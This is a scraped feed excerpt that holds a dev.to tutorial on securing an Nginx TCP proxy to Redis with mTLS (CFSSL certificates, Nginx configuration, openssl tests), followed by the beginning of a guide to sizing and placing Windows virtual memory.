&lt;p&gt;mTLS (mutual TLS) extends the security mechanism of traditional one-way TLS by requiring both the client and the server to present and verify each other’s digital certificates during the TLS handshake process. This two-way identity verification ensures that:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; The client can confirm that the connected server is a legitimate target (preventing man-in-the-middle attacks by fake servers);&lt;/li&gt;
&lt;li&gt; The server can verify that the accessing client has the required access permissions (avoiding unauthorized access by malicious clients).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The core principle of mTLS relies on a trusted certificate chain: both parties’ certificates are issued by a trusted Certificate Authority (CA). During authentication, each party verifies the validity of the other’s certificate (including checking the certificate’s expiration date, signature integrity, and whether it has been revoked) to confirm the other’s identity.&lt;/p&gt;
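&lt;p&gt;For a concrete picture of the handshake requirements, the policy Nginx will enforce below (server certificate presented, client certificate mandatory, TLS 1.2+) can be expressed with Python’s standard &lt;code&gt;ssl&lt;/code&gt; module. Certificate loading is optional in this sketch only so it stays self-contained; the file paths correspond to the files generated in section 3.2:&lt;/p&gt;

```python
import ssl

def make_mtls_server_context(server_cert=None, server_key=None, ca_cert=None):
    """Server-side SSLContext that enforces mutual TLS."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse TLS 1.0/1.1
    if server_cert:
        # e.g. server.pem / server-key.pem from section 3.2.3
        ctx.load_cert_chain(certfile=server_cert, keyfile=server_key)
    if ca_cert:
        # trust our private root CA (ca.pem) for verifying client certificates
        ctx.load_verify_locations(cafile=ca_cert)
    ctx.verify_mode = ssl.CERT_REQUIRED  # the analogue of `ssl_verify_client on`
    return ctx
```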

&lt;h3&gt;
  
  
  3.2 Generating Certificates and Keys
&lt;/h3&gt;

&lt;p&gt;This section uses the CFSSL tool (a command-line toolset for TLS/SSL certificate management) to generate the required certificates for mTLS, including the root CA certificate, server certificate, and client certificate.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.2.1 Installing the CFSSL Tool
&lt;/h4&gt;

&lt;p&gt;Download and install the CFSSL toolset in the &lt;code&gt;/usr/local/bin&lt;/code&gt; directory (applicable to Linux x86_64 systems):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;wget -q -O /usr/local/bin/cfssl https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssl_1.6.4_linux_amd64
wget -q -O /usr/local/bin/cfssljson https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssljson_1.6.4_linux_amd64
wget -q -O /usr/local/bin/cfssl-certinfo https://github.com/cloudflare/cfssl/releases/download/v1.6.4/cfssl-certinfo_1.6.4_linux_amd64

# Add executable permissions to the tools
chmod +x /usr/local/bin/cfssl /usr/local/bin/cfssljson /usr/local/bin/cfssl-certinfo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Verify the installation by running &lt;code&gt;cfssl version&lt;/code&gt;; a version number output indicates successful installation.&lt;/p&gt;

&lt;h4&gt;
  
  
  3.2.2 Generating the Root CA Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create a CA configuration directory&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir -p /etc/nginx/certs &amp;amp;&amp;amp; cd /etc/nginx/certs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt; &lt;strong&gt;Create the CA policy file (&lt;code&gt;ca-config.json&lt;/code&gt;)&lt;/strong&gt; This file defines the validity period and usage scope of the certificates issued by the CA (the inline &lt;code&gt;#&lt;/code&gt; comments in the blocks below are explanatory only; strip them before use, since JSON does not permit comments):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "signing": {
        "default": {
            "expiry": "87600h" # Default validity for issued certificates (10 years)
        },
        "profiles": {
            "server": {
                "expiry": "43800h", # Server certificate validity period (5 years)
                "usages": [
                    "signing",
                    "key encipherment",
                    "server auth" # Certificate usage: server authentication
                ]
            },
            "client": {
                "expiry": "43800h", # Client certificate validity period (5 years)
                "usages": [
                    "signing",
                    "key encipherment",
                    "client auth" # Certificate usage: client authentication
                ]
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="3"&gt;
&lt;li&gt; &lt;strong&gt;Create the CA certificate signing request (CSR) configuration file (&lt;code&gt;ca-csr.json&lt;/code&gt;)&lt;/strong&gt; This file contains the basic information of the root CA (such as organization name and region):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "CN": "MyEnterpriseRootCA", # Common Name of the root CA
    "key": {
        "algo": "rsa", # Encryption algorithm: RSA
        "size": 2048 # Key length: 2048 bits
    },
    "names": [
        {
            "C": "CN", # Country/Region
            "L": "Beijing", # City
            "ST": "Beijing", # Province/State
            "O": "MyEnterprise", # Organization name
            "OU": "IT Department" # Organizational Unit
        }
    ],
    "ca": {"expiry": "87600h"}
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="4"&gt;
&lt;li&gt; &lt;strong&gt;Generate the root CA certificate and private key&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -initca ca-csr.json | cfssljson -bare ca
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, the following files will be generated in the current directory:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;ca.pem&lt;/code&gt;: Root CA public certificate (used to verify server/client certificates)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;ca-key.pem&lt;/code&gt;: Root CA private key (used to sign server/client certificates; keep it secure)&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;ca.csr&lt;/code&gt;: CA certificate signing request file (for reference only)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.3 Generating the Server Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the server CSR configuration file (&lt;code&gt;server-csr.json&lt;/code&gt;)&lt;/strong&gt; Note that the &lt;code&gt;hosts&lt;/code&gt; field must include the actual domain name or IP address of the Nginx server (to ensure certificate domain verification passes):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "CN": "nginx-proxy.example.com", # Common Name of the server (consistent with the access domain name)
    "key": {
        "algo": "rsa",
        "size": 2048
    },
    "names": [
        {
            "C": "CN",
            "L": "Beijing",
            "ST": "Beijing",
            "O": "MyEnterprise",
            "OU": "IT Department"
        }
    ],
    "hosts": [
        "127.0.0.1",
        "192.168.1.200", # Nginx server IP address
        "nginx-proxy.example.com" # Nginx server domain name
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt; &lt;strong&gt;Generate the server certificate and private key.&lt;/strong&gt; Use the root CA to sign the server certificate:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -ca=ca.pem -ca-key=ca-key.pem -config=ca-config.json -profile=server server-csr.json | cfssljson -bare server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generated files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;server.pem&lt;/code&gt;: Server public certificate&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;server-key.pem&lt;/code&gt;: Server private key&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.4 Generating the Client Certificate
&lt;/h4&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Create the client CSR configuration file (&lt;code&gt;client-csr.json&lt;/code&gt;)&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
    "CN": "mtls-client-001", # Client identifier (customizable, e.g., a client ID)
    "key": {
        "algo": "rsa",
        "size": 2048
    },
    "names": [
        {
            "C": "CN",
            "L": "Beijing",
            "ST": "Beijing",
            "O": "MyEnterprise",
            "OU": "Operations Department"
        }
    ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt; &lt;strong&gt;Generate the client certificate and private key&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cfssl gencert -ca=ca.pem -ca-key=ca-key.pem -config=ca-config.json -profile=client client-csr.json | cfssljson -bare client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generated files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;client.pem&lt;/code&gt;: Client public certificate&lt;/li&gt;
&lt;li&gt;  &lt;code&gt;client-key.pem&lt;/code&gt;: Client private key&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  3.2.5 Verifying Certificate Validity
&lt;/h4&gt;

&lt;p&gt;Use the &lt;code&gt;openssl&lt;/code&gt; command to verify the integrity of the generated certificates and the validity of the certificate chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Verify the server certificate (using the root CA)
openssl verify -CAfile ca.pem server.pem

# Verify the client certificate (using the root CA)
openssl verify -CAfile ca.pem client.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the output shows &lt;code&gt;server.pem: OK&lt;/code&gt; and &lt;code&gt;client.pem: OK&lt;/code&gt;, the certificates are valid and the certificate chain is intact.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Configuring mTLS
&lt;/h3&gt;

&lt;p&gt;Modify the Nginx TCP proxy configuration file (&lt;code&gt;/etc/nginx/stream.d/redis-proxy.conf&lt;/code&gt;) to enable mTLS mutual authentication. The updated configuration is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;upstream redis_backend {
    server 192.168.1.100:6379;
    keepalive 32;
}

server {
    listen 6380 ssl; # Enable SSL for the listening port

    # Server certificate configuration
    ssl_certificate /etc/nginx/certs/server.pem; # Server public certificate path
    ssl_certificate_key /etc/nginx/certs/server-key.pem; # Server private key path

    # mTLS client authentication configuration
    ssl_client_certificate /etc/nginx/certs/ca.pem; # Root CA certificate (used to verify client certificates)
    ssl_verify_client on; # Enable client certificate verification (mandatory)
    # ssl_verify_depth 2; # Set the certificate verification depth (default is 1; adjust if using intermediate CAs)

    # SSL/TLS security optimization parameters
    ssl_protocols TLSv1.2 TLSv1.3; # Disable insecure protocols (e.g., TLSv1.0, TLSv1.1)
    ssl_prefer_server_ciphers on; # Prioritize server-side cipher suites
    ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH"; # Secure cipher suite list

    # Proxy forwarding configuration
    proxy_pass redis_backend;
    proxy_timeout 300s;
    proxy_buffer_size 16k;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After modifying the configuration, verify and reload Nginx:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nginx -t &amp;amp;&amp;amp; sudo systemctl reload nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4. Configuration Verification and Testing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  4.1 Checking Configuration Correctness
&lt;/h3&gt;

&lt;p&gt;In addition to using &lt;code&gt;nginx -t&lt;/code&gt; to verify the syntax of the configuration file, you can also check the Nginx error log to confirm whether the mTLS configuration is loaded normally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo tail -f /var/log/nginx/error.log
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If no error messages (such as “SSL_CTX_load_verify_locations failed” or “invalid certificate”) appear, the mTLS configuration has been loaded successfully.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Testing Mutual Encryption Authentication
&lt;/h3&gt;

&lt;p&gt;Use the &lt;code&gt;openssl s_client&lt;/code&gt; tool on the client to simulate a TLS connection and test the mTLS authentication process. Ensure the client has the &lt;code&gt;client.pem&lt;/code&gt;, &lt;code&gt;client-key.pem&lt;/code&gt;, and &lt;code&gt;ca.pem&lt;/code&gt; files.&lt;/p&gt;

&lt;h4&gt;
  
  
  4.2.1 Testing a Valid Client Connection
&lt;/h4&gt;

&lt;p&gt;Run the following command to establish a TLS connection to the Nginx proxy port (6380):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;openssl s_client -connect 192.168.1.200:6380 \
    -cert /path/to/client.pem \
    -key /path/to/client-key.pem \
    -CAfile /path/to/ca.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If the connection is successful, the output will include the following key information:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;code&gt;Verify return code: 0 (ok)&lt;/code&gt; (indicating successful certificate verification)&lt;/li&gt;
&lt;li&gt;  Detailed information about the server certificate (such as issuer, validity period)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Next, test the Redis service access (enter the following commands in the &lt;code&gt;openssl s_client&lt;/code&gt; interactive interface):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Enter Redis authentication password (if the backend Redis has authentication enabled)
AUTH YourRedisPassword
# Expected response: +OK

# Test the Redis PING command
PING
# Expected response: +PONG

# Test data writing and reading
SET test_key "mtls_test_value"
# Expected response: +OK

GET test_key
# Expected response: $15\r\nmtls_test_value (the bulk-string header is the value's byte length, 15)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
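&lt;p&gt;The &lt;code&gt;+OK&lt;/code&gt;, &lt;code&gt;+PONG&lt;/code&gt;, and &lt;code&gt;$&lt;/code&gt;-prefixed responses above are Redis’s RESP wire protocol: simple strings start with &lt;code&gt;+&lt;/code&gt;, and bulk strings announce their byte length after &lt;code&gt;$&lt;/code&gt;. A minimal Python sketch of decoding such replies (the function name is illustrative, not part of any Redis client):&lt;/p&gt;

```python
def parse_resp_reply(reply: bytes):
    """Decode the two RESP reply types shown above: +simple and $bulk strings."""
    if reply.startswith(b"+"):
        # Simple string: everything up to the first CRLF
        return reply[1:].split(b"\r\n", 1)[0].decode()
    if reply.startswith(b"$"):
        # Bulk string: "$LEN\r\nPAYLOAD\r\n"; a length of -1 is a null reply
        head, _, rest = reply.partition(b"\r\n")
        length = int(head[1:])
        if length == -1:
            return None
        return rest[:length].decode()
    raise ValueError("unsupported reply type")
```

&lt;p&gt;Note that the bulk-string reply for &lt;code&gt;mtls_test_value&lt;/code&gt; carries the header &lt;code&gt;$15&lt;/code&gt;, the value’s length in bytes.&lt;/p&gt;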



&lt;h4&gt;
  
  
  4.2.2 Testing an Invalid Client Connection
&lt;/h4&gt;

&lt;p&gt;To verify the security of mTLS, test scenarios with invalid client certificates (e.g., using an unsigned certificate or omitting the client certificate):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Scenario 1: Omit the client certificate
openssl s_client -connect 192.168.1.200:6380 -CAfile /path/to/ca.pem

# Scenario 2: Use an untrusted client certificate
openssl s_client -connect 192.168.1.200:6380 \
    -cert /path/to/untrusted-client.pem \
    -key /path/to/untrusted-client-key.pem \
    -CAfile /path/to/ca.pem
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In both scenarios, the handshake should fail and the connection should be rejected. With an untrusted client certificate, the output includes a non-zero verify result such as &lt;code&gt;Verify return code: 19 (self-signed certificate in certificate chain)&lt;/code&gt;; when the client certificate is omitted, the server aborts the handshake with an alert such as &lt;code&gt;SSL alert number 116&lt;/code&gt; (“certificate required” in TLS 1.3). Either outcome confirms that mTLS effectively blocks unauthorized access.&lt;/p&gt;
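&lt;p&gt;When scripting these checks, for example in a deployment pipeline, the pass/fail signal can be pulled out of the &lt;code&gt;openssl s_client&lt;/code&gt; output. A small sketch in Python (the helper name is invented for illustration):&lt;/p&gt;

```python
import re

def parse_verify_code(s_client_output: str):
    """Extract (code, message) from the 'Verify return code' line of openssl s_client."""
    m = re.search(r"Verify return code:\s*(\d+)\s*\(([^)]*)\)", s_client_output)
    if m is None:
        return None
    return int(m.group(1)), m.group(2)
```

&lt;p&gt;A result of &lt;code&gt;(0, "ok")&lt;/code&gt; corresponds to the successful mutual authentication described in section 4.2.1; any non-zero code indicates a verification failure.&lt;/p&gt;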

&lt;h2&gt;
  
  
  5. Conclusion
&lt;/h2&gt;

&lt;p&gt;This document systematically elaborates on the implementation process of Nginx TCP Layer 4 port proxy and mTLS mutual encryption authentication, covering technical background, configuration steps, and verification methods. By combining Nginx’s high-performance proxy capabilities with mTLS’s strict mutual authentication mechanism, enterprises can establish a secure and reliable network communication channel, effectively addressing security risks such as unauthorized access and data leakage in traditional proxy architectures.&lt;/p&gt;

</description>
      <category>nginx</category>
      <category>tls</category>
      <category>encryption</category>
    </item>
    <item>
      <title>Complete Guide to Windows Virtual Memory: From Principles to Practice, Fix Low Memory Lag Issues</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 17 Nov 2025 11:09:56 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues-4b6j</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues-4b6j</guid>
      <description>&lt;p&gt;Have you often encountered sudden lag on your Windows PC, received “low memory” warnings when opening multiple tasks, or watched the progress bar stall endlessly when running large software like Photoshop or Premiere Pro? Many times, this isn’t because your physical memory (RAM) is completely insufficient, but because your virtual memory configuration hasn’t kept up with your actual needs. This article will start from technical principles, combine the latest features of Windows systems in 2025, and teach you how to scientifically set up virtual memory to avoid resource waste while maximizing system performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article: &lt;a href="https://devresourcehub.com/complete-guide-to-windows-virtual-memory-from-principles-to-practice-fix-low-memory-lag-issues.html" rel="noopener noreferrer"&gt;Complete Guide to Windows Virtual Memory: From Principles to Practice, Fix Low Memory Lag Issues&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7n4eln80ru4qetym9ti.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb7n4eln80ru4qetym9ti.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. What is Virtual Memory? Why is it Important for Windows?
&lt;/h2&gt;

&lt;p&gt;Before diving into setup methods, we need to understand: what role does virtual memory actually play? Simply put, it’s “temporary memory” simulated by the Windows system using hard drive space. When physical memory (RAM) is occupied to a certain extent, the system automatically transfers infrequently used data to virtual memory, thereby freeing up RAM resources for active applications.&lt;/p&gt;

&lt;p&gt;Here’s a key insight: &lt;strong&gt;virtual memory is not a “replacement” for RAM, but a “supplement”&lt;/strong&gt;. Because even an SSD reads and writes far more slowly than RAM (typically more than 10 times slower), over-reliance on virtual memory will itself slow the system down. Without it, however, applications will crash or the system will freeze outright once RAM is exhausted.&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Difference Comparison Between RAM and Virtual Memory (Hard Drive)
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Physical Memory (RAM)&lt;/th&gt;
&lt;th&gt;Virtual Memory (HDD/SSD)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Read-Write Speed&lt;/td&gt;
&lt;td&gt;Extremely fast (DDR4 ~20GB/s, DDR5 up to 50GB/s+)&lt;/td&gt;
&lt;td&gt;Slower (SATA SSD ~500MB/s, NVMe SSD ~3-7GB/s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage Capacity&lt;/td&gt;
&lt;td&gt;Smaller (common sizes: 8GB, 16GB, 32GB)&lt;/td&gt;
&lt;td&gt;Larger (depends on remaining hard drive space)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Persistence&lt;/td&gt;
&lt;td&gt;Lost when power is off (temporary storage)&lt;/td&gt;
&lt;td&gt;Retained when power is off (stores page file long-term)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Core Function&lt;/td&gt;
&lt;td&gt;Runs currently active applications/processes&lt;/td&gt;
&lt;td&gt;Temporarily stores inactive data to free up RAM&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. When Do You Need to Manually Set Virtual Memory? Isn’t Default Automatic Management Sufficient?
&lt;/h2&gt;

&lt;p&gt;Windows systems by default “automatically manage paging file size for all drives”, dynamically adjusting virtual memory based on RAM capacity and usage. However, in the following 4 scenarios, &lt;strong&gt;manually setting virtual memory can significantly improve the experience&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 1: Small physical memory (≤4GB)&lt;/strong&gt; : Default settings may frequently trigger “low memory” warnings due to insufficient virtual memory, leading to browser crashes and unsaved document loss.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 2: Running professional software/games&lt;/strong&gt;: Some design software (such as AutoCAD, 3ds Max) and large games (such as &lt;em&gt;Cyberpunk 2077&lt;/em&gt;) clearly require a minimum virtual memory size. Failure to meet this requirement may result in failure to launch or frequent crashes.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 3: System lags frequently but RAM is not full&lt;/strong&gt;: This may be due to unreasonable default virtual memory allocation, causing the system to frequently “swap data” between RAM and hard drive (known as “page thrashing”).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Scenario 4: System drive space is tight&lt;/strong&gt;: By default, virtual memory is stored on the C drive. If the remaining space on the C drive is less than 10GB, virtual memory may not be able to expand, leading to performance issues.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3. What’s the Right Size for Windows Virtual Memory? 2025 Latest Recommended Plan
&lt;/h2&gt;

&lt;p&gt;There’s no “one-size-fits-all” standard for virtual memory size, but it can be accurately matched based on &lt;strong&gt;physical memory capacity&lt;/strong&gt; and &lt;strong&gt;usage scenarios&lt;/strong&gt;. Below is a tested and verified recommended plan (unit: GB, 1GB=1024MB):&lt;/p&gt;

&lt;h3&gt;
  
  
  Virtual Memory Setting Recommendations for Different RAM Capacities
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Physical Memory (RAM)&lt;/th&gt;
&lt;th&gt;Is Disabling Virtual Memory Recommended?&lt;/th&gt;
&lt;th&gt;Recommended Initial Size&lt;/th&gt;
&lt;th&gt;Recommended Maximum Size&lt;/th&gt;
&lt;th&gt;Applicable Scenarios&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;≤4GB&lt;/td&gt;
&lt;td&gt;❌ Definitely not recommended&lt;/td&gt;
&lt;td&gt;RAM×1.5 (e.g., 4GB→6GB)&lt;/td&gt;
&lt;td&gt;RAM×3 (e.g., 4GB→12GB)&lt;/td&gt;
&lt;td&gt;Daily office work (Word/Excel), light web browsing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8GB&lt;/td&gt;
&lt;td&gt;❌ Not recommended&lt;/td&gt;
&lt;td&gt;RAM×1 (e.g., 8GB→8GB)&lt;/td&gt;
&lt;td&gt;RAM×2 (e.g., 8GB→16GB)&lt;/td&gt;
&lt;td&gt;Moderate multitasking, light design (basic Photoshop editing), mainstream online games&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16GB&lt;/td&gt;
&lt;td&gt;✅ Optional to disable&lt;/td&gt;
&lt;td&gt;RAM×0.5 (e.g., 16GB→8GB)&lt;/td&gt;
&lt;td&gt;RAM×1.5 (e.g., 16GB→24GB)&lt;/td&gt;
&lt;td&gt;Heavy multitasking, professional design, 3A games (1080P)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;≥32GB&lt;/td&gt;
&lt;td&gt;✅ Recommended to disable (unless special needs)&lt;/td&gt;
&lt;td&gt;2GB (minimum guarantee)&lt;/td&gt;
&lt;td&gt;8GB (maximum limit)&lt;/td&gt;
&lt;td&gt;Workstation-level tasks (video rendering, multiple VMs running)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Important Reminder&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Set the “Initial Size” and “Maximum Size” of virtual memory to the same value, so the system does not fragment the hard drive by repeatedly resizing the page file.&lt;/li&gt;
&lt;li&gt; Keep the maximum size below 1/8 of the partition’s remaining free space, so the page file does not occupy too much storage.&lt;/li&gt;
&lt;/ol&gt;
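&lt;p&gt;The tiers in the table can be expressed as a small lookup function. This is only a sketch of the recommendations above (the function name, and the boundaries between the listed RAM sizes, are my own interpolation):&lt;/p&gt;

```python
def recommended_pagefile_mb(ram_gb: float):
    """Return (initial_mb, maximum_mb) per the recommendation table (1 GB = 1024 MB)."""
    ram_mb = int(ram_gb * 1024)
    if ram_gb <= 4:
        return ram_mb * 3 // 2, ram_mb * 3    # RAM x 1.5, RAM x 3
    if ram_gb <= 8:
        return ram_mb, ram_mb * 2             # RAM x 1,   RAM x 2
    if ram_gb <= 16:
        return ram_mb // 2, ram_mb * 3 // 2   # RAM x 0.5, RAM x 1.5
    return 2 * 1024, 8 * 1024                 # fixed 2 GB minimum / 8 GB cap for 32 GB+
```

&lt;p&gt;Per the reminder above, in practice you would enter the same value (e.g., the initial size) for both fields in the Windows dialog.&lt;/p&gt;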

&lt;h3&gt;
  
  
  Which Drive to Set Virtual Memory On? Tips for Maximizing Performance
&lt;/h3&gt;

&lt;p&gt;Choosing the right partition has a greater impact on performance than worrying about the size! The correct priority order is:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;First choice: NVMe SSD partition with sufficient free space&lt;/strong&gt;: The high-speed read-write of NVMe SSD can minimize the performance loss of virtual memory, and do not choose the system drive (C drive) to avoid seizing system I/O resources.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Second choice: SATA SSD partition&lt;/strong&gt;: Performance is slightly inferior to NVMe but still much better than mechanical hard drives.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Not recommended: Mechanical hard drive (HDD)&lt;/strong&gt; : Read-write speed is too slow, overuse will cause severe system lag.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  4. 3 Methods to Set Windows Virtual Memory: GUI + Command Line + PowerShell
&lt;/h2&gt;

&lt;p&gt;Below are virtual memory setup methods for different user habits, covering GUI (suitable for ordinary users) and command line (suitable for IT administrators/advanced users). The operation steps have been verified on Windows 10/11 systems.&lt;/p&gt;

&lt;h3&gt;
  
  
  Method 1: Set via “System Properties” GUI (Most Common)
&lt;/h3&gt;

&lt;p&gt;Suitable for most users with intuitive steps and no code required:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Press &lt;strong&gt;Win + R&lt;/strong&gt; to open the “Run” dialog box, type &lt;strong&gt;systempropertiesadvanced&lt;/strong&gt; and press Enter to open the “System Properties” window.&lt;/li&gt;
&lt;li&gt;  In “System Properties”, switch to the “Advanced” tab, and click the [Settings] button in the “Performance” area.&lt;/li&gt;
&lt;li&gt;  In the “Performance Options” window, continue to switch to the “Advanced” tab, and click the [Change] button in the “Virtual Memory” area.&lt;/li&gt;
&lt;/ul&gt;

